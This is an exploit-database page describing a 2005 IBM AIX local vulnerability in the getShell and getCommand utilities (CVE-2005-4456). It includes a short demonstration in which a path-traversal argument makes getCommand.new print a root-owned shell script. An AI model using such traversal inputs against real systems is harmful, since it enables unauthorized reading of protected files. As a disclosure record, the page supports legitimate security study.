header-logo
Suggest Exploit
vendor:
AIX
by:
Unknown
7.2
CVSS
HIGH
Local Vulnerability
264
CWE
Product Name: AIX
Affected Version From: AIX 5.2
Affected Version To: AIX 5.2
Patch Exists: No
Related CWE: CVE-2005-4456
CPE: o:ibm:aix:5.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: AIX
2005

IBM AIX getShell and getCommand Local Vulnerability

IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulnerability may let the attacker gain unauthorized read access to shell scripts on the computer. An example of the exploit is shown, where the attacker is able to read the contents of a shell script and then execute it.

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16103/info

IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulnerability may let the attacker gain unauthorized read access to shell scripts on the computer. 

-bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40
/tmp/k.sh
-bash-3.00$./getCommand.new ../../../../../tmp/k.sh

ps -ef > /tmp/log. $$
grep test /tmp/log.
$$ rm /tmp/log. $$

Navigation

Suggest Exploit

Services By CQR